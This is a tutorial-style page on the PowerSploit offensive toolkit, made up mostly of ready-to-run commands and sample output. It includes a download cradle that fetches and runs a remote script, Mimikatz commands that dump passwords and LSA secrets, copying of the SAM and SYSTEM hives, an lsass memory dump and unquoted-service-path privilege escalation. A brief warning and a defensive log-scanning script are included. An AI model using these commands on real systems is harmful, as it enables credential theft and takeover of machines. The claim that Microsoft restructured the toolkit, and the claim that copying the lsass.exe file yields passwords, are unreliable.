PowerSploit

PowerShell Exploitation Toolkit

💻 What is PowerSploit?

PowerSploit is a powerful PowerShell-based exploitation toolkit that provides modules for post-exploitation, anti-forensics, and security testing. It builds on the capabilities of Windows PowerShell.

👉 It is the most widely used collection of PowerShell scripts for Windows post-exploitation.

🔍 What PowerSploit can do

  • Privilege Escalation: gain admin privileges
  • Code Execution: remote code injection
  • Exfiltration: data download/transfer
  • Antivirus Evasion: AMSI bypass techniques
  • Script Modification: in-memory execution
  • Recon Modules: system information gathering

⚙️ Install / Use PowerSploit

GitHub Installation & Setup

Clone the PowerSploit repository

git clone https://github.com/PowerShellMafia/PowerSploit.git

Go to the PowerSploit directory

cd PowerSploit

👉 Note: PowerSploit is not installed directly; its scripts are imported like PowerShell modules.

Import a module (every time you use it)

Import-Module .\Privesc\PowerUp.ps1
Import-Module .\Exfiltration\Invoke-NinjaCopy.ps1

Or Download Specific Script

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')

💻 Common Modules & Commands

👉 Key PowerSploit modules and their commands:

PowerUp Privilege Escalation

Import-Module PowerUp.ps1
Invoke-AllChecks

Check for Service Vulnerabilities

Get-ServiceUnquoted
Get-ModifiableServiceFile

Invoke-Mimikatz Credentials

Import-Module Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

Invoke-NinjaCopy File Copy

Import-Module Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\SAM"

Invoke-Shellcode Code Execution

Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)

Out-Minidump Process Dump

Get-Process lsass | Out-Minidump -DumpFilePath C:\lsass.dmp

🌐 Real Example (Practical understanding)

🎯 Privilege Escalation with PowerUp

# Import the PowerUp module
Import-Module .\PowerUp.ps1

# Run all privilege escalation checks
Invoke-AllChecks

👉 This command checks the system for every privilege escalation vector PowerUp knows about.

📊 Understanding the output

Suppose the PowerUp output looks something like this:

[*] Checking service permissions...
[!] Service 'VulnService' is writable
[*] Path: C:\Program Files\VulnApp\service.exe
[*] Current user has Write access
[*] Checking for unquoted service paths...
[!] Unquoted path detected: C:\Program Files\My App\service.exe
[*] Exploit: Create malicious C:\Program.exe

🧠 What this means:

  • Writable: the service binary is replaceable. Create a malicious service.exe → gain SYSTEM
  • Unquoted: the service path is unquoted. Create a malicious C:\Program.exe → gain privileges

🔑 Credentials Extraction Example

Using Invoke-Mimikatz (PowerSploit wrapper)

Import-Module Invoke-Mimikatz.ps1

# Extract logon passwords
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

# Dump LSA secrets
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Output:

[*] Invoke-Mimikatz executing...
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 123456
User Name : Administrator
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
Password : P@ssw0rd123

👉 PowerSploit wraps Mimikatz in PowerShell → script-based automation

🔥 Advanced Example - Copy Locked Files

Copy SAM File (locked by Windows)

Import-Module Invoke-NinjaCopy.ps1

# Copy SAM registry hive (usually locked)
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\temp\SAM"

# Copy the SYSTEM hive, which holds the keys needed to decrypt the SAM
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\temp\SYSTEM"

# Copy the lsass.exe binary (this copies the file on disk, not the process memory)
Invoke-NinjaCopy -Path "C:\Windows\System32\lsass.exe" -LocalDestination "C:\temp\lsass.exe"

👉 What happens:

  • Bypass Locks: read locked files
  • Copy to Local: save to a temp folder
  • Analyze Offline: extract passwords

👉 Invoke-NinjaCopy allows reading files that Windows normally keeps locked, like SAM, SYSTEM and LSASS.

⚠️ Important Warning

Use PowerSploit modules only on authorized systems.

🚨 Critical Points:

  • AMSI Detection: Windows PowerShell can detect it via AMSI
  • Execution Policy: the PowerShell execution policy may need to be bypassed
  • Malicious Use: using it without permission is a cyber crime
  • Educational Purpose: use it for test labs and authorized penetration testing

📌 Official Status: PowerSploit was restructured by Microsoft to differentiate it from malicious scripts, and it is also used for defense.
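As a defender-side counterpart to the AMSI point above, here is an added example (not part of the original page or of PowerSploit) that scans PowerShell script block log text, the kind recorded as Event ID 4104, for the cmdlet names, download cradle and Mimikatz command strings shown on this page. The record ids and log text are constructed; obfuscated scripts will not match these plain patterns, so treat the hits as a starting point, not a complete detection.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records in the shape of Event ID 4104 (PowerShell
# script block logging) entries: (record_id, script_block_text).
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (101, "Get-ChildItem C:\\Users | Measure-Object"),
    (102, "Import-Module .\\Privesc\\PowerUp.ps1; Invoke-AllChecks"),
    (103, "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')"),
    (104, "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"),
    (105, "Get-Process lsass | Out-Minidump -DumpFilePath C:\\lsass.dmp"),
]

# Indicators taken from the modules and commands shown on this page.
INDICATORS = {
    "powersploit-function": r"\b(Invoke-AllChecks|Get-ServiceUnquoted|Get-ModifiableServiceFile"
                            r"|Invoke-Mimikatz|Invoke-NinjaCopy|Invoke-Shellcode|Out-Minidump)\b",
    "download-cradle": r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString",
    "mimikatz-command": r"(sekurlsa::logonpasswords|lsadump::lsa|privilege::debug)",
    "lsass-dump": r"Get-Process\s+lsass\b.*Out-Minidump",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}


def scan_script_block(text: str) -> List[str]:
    """Return the indicator names that match one script block's text."""
    return [name for name, rx in COMPILED.items() if rx.search(text)]


def scan_events(events: List[Tuple[int, str]]) -> Dict[int, List[str]]:
    """Map record id -> matched indicator names; clean records are omitted."""
    hits: Dict[int, List[str]] = {}
    for record_id, text in events:
        matched = scan_script_block(text)
        if matched:
            hits[record_id] = matched
    return hits


if __name__ == "__main__":
    for rid, names in scan_events(SAMPLE_EVENTS).items():
        print(f"record {rid}: {', '.join(names)}")
```

Script block logging records the block as it is handed to the engine, so a cradle that downloads PowerUp.ps1 is logged in clear text even when the download itself is encrypted in transit.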

🧩 Related Tools

  • Mimikatz: native credentials tool
  • Empire: C2 framework
  • Metasploit: exploitation framework
  • PowerShell Empire: PS-based post-exploitation

💡 In simple terms

PowerSploit = "the Swiss Army Knife of PowerShell"

It uses the full power of Windows PowerShell to automate post-exploitation tasks. Import the scripts, run the commands, and take complete control of the system.